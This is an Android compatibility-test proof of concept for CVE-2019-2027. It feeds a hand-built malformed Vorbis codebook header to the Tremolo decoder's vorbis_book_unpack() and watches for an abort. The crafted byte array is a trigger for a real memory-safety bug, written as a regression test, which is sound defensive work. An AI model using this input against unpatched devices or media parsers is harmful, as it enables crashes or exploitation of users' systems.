unplugged-system/cts/hostsidetests/securitybulletin/securityPatch/CVE-2019-2027/poc.cpp


/**
* Copyright (C) 2021 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "../includes/common.h"
#define REF_COUNT 1
extern "C" {
#include <Tremolo/codebook.h>
}
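/*
 * True only while main() is inside the vorbis_book_unpack() call. The handler
 * uses it to tell an abort raised by the code under test from an abort raised
 * anywhere else in the program.
 */
bool testInProgress = false;

/*
 * new_action is the disposition main() installs for SIGABRT; old_action is
 * filled in by the same sigaction() call with the disposition that was active
 * before, so the handler can hand the signal back to it.
 */
struct sigaction new_action, old_action;

/**
 * SIGABRT filter for the test.
 *
 * An abort seen while testInProgress is set is passed on to the disposition
 * that was installed before this handler, so it is reported the way it would
 * have been without the filter. Anything else ends the process with
 * EXIT_FAILURE.
 *
 * The saved disposition is inspected before it is called. Only a handler
 * registered with SA_SIGINFO may be invoked through sa_sigaction; a plain
 * handler goes through sa_handler; SIG_DFL and SIG_IGN are not callable
 * addresses at all. Calling them unconditionally would fault inside the
 * handler and replace the SIGABRT being tested for with a different signal.
 *
 * Only async-signal-safe calls are used: _exit, sigaction and raise.
 *
 * @param signum  signal number delivered to the handler
 * @param info    signal details; si_signo is compared against SIGABRT
 * @param context opaque context, forwarded unchanged
 */
void sigabrt_handler(int signum, siginfo_t *info, void *context) {
    if (!testInProgress || info->si_signo != SIGABRT) {
        _exit(EXIT_FAILURE);
    }

    if ((old_action.sa_flags & SA_SIGINFO) != 0) {
        if (old_action.sa_sigaction != NULL) {
            (*old_action.sa_sigaction)(signum, info, context);
            return;
        }
    } else if (old_action.sa_handler != SIG_DFL &&
               old_action.sa_handler != SIG_IGN) {
        (*old_action.sa_handler)(signum);
        return;
    }

    /*
     * No callable previous handler (default, ignore, or nothing was saved):
     * put the previous disposition back and raise the signal again so the
     * process ends the way it would have without this filter.
     */
    sigaction(signum, &old_action, NULL);
    raise(signum);
}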
/*
 * Hand-built codebook header that main() passes to vorbis_book_unpack().
 * Each comment below names the field that the following byte(s) encode and
 * its width, in stream order. Bits inside a byte are consumed starting from
 * the least-significant one: 0x06 reads as "ordering clear, unused-entries
 * set, first entry valid, 5-bit length of zero".
 * NOTE(review): the decoded values quoted in parentheses assume multi-byte
 * fields are stored least-significant byte first; confirm against the bit
 * reader before relying on them.
 */
unsigned char data[] = {/* 24 bits to make sure the alignment is correct */
0x42, 0x43, 0x56,
/* 16 bits for codebook.dim (0x0040, i.e. 64, under the assumption above) */
0x40, 0x00,
/* 24 bits for codebook.entries (0x000010, i.e. 16, under the assumption above) */
0x10, 0x00, 0x00,
/* 1 bit for ordering which is unset for unordered */
/* 1 bit set for specifying unused entries */
/* 1 bit for valid length */
/* 5 bits for length of entry */
0x06,
/* 1 bit for valid length */
/* 5 bits for length of entry */
/* 2 bits for specifying invalid length for next 2 entries */
0x01,
/* 8 bits for specifying invalid length for next 8 entries */
0x00,
/* 4 bits for specifying invalid length for next 4 entries */
/* 4 bits for specifying the map type 1 */
/* Taken together: two entries carry a length and 2 + 8 + 4 = 14 are marked invalid. */
0x10,
/* 32 bits for codebook.q_min */
0x00, 0x00, 0x00, 0x00,
/* 32 bits for codebook.q_del */
0x00, 0x00, 0x00, 0x00,
/* 4 bits for codebook.q_bits */
/* 1 bit for codebook.q_seq */
/* 4 bits for quantized values of codebook.q_val for quantvals = 2 */
/* 7 bits remaining unused */
0x01, 0x00};
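/**
 * Test driver (the file path places it under CVE-2019-2027).
 *
 * Installs sigabrt_handler for SIGABRT, wraps the static `data` buffer in an
 * ogg_buffer / ogg_reference pair, initialises a bit reader over it and calls
 * vorbis_book_unpack() once. testInProgress is set only around that call, so
 * an abort is attributed to the library only if it happens inside it.
 *
 * @return EXIT_SUCCESS when the call completes and FAIL_CHECK passes;
 *         EXIT_FAILURE when the SIGABRT filter cannot be installed.
 */
int main() {
    sigemptyset(&new_action.sa_mask);
    new_action.sa_flags = SA_SIGINFO;
    new_action.sa_sigaction = sigabrt_handler;
    /*
     * Without the filter an abort outside the test window could not be told
     * apart from one inside it, so a failed install is a setup failure. It is
     * reported with the same exit code the handler uses for that case.
     */
    if (sigaction(SIGABRT, &new_action, &old_action) != 0) {
        return EXIT_FAILURE;
    }

    ogg_buffer buf;
    ogg_reference ref;
    oggpack_buffer bits;
    codebook book = {};
    memset(&buf, 0, sizeof(buf));
    memset(&ref, 0, sizeof(ref));
    memset(&bits, 0, sizeof(bits));

    /* The buffer and the reference both describe exactly sizeof(data) bytes. */
    buf.data = (uint8_t *)data;
    buf.size = sizeof(data);
    buf.refcount = REF_COUNT;
    ref.buffer = &buf;
    ref.length = sizeof(data);
    oggpack_readinit(&bits, &ref);

    /* Open the window in which a SIGABRT is forwarded instead of filtered. */
    testInProgress = true;
    /* NOTE(review): FAIL_CHECK comes from ../includes/common.h, which is not
     * shown here; it is presumably what ends the run when the library rejects
     * the input (non-zero return). Confirm against that header. */
    FAIL_CHECK(vorbis_book_unpack(&bits, &book) == 0);
    testInProgress = false;
    return EXIT_SUCCESS;
}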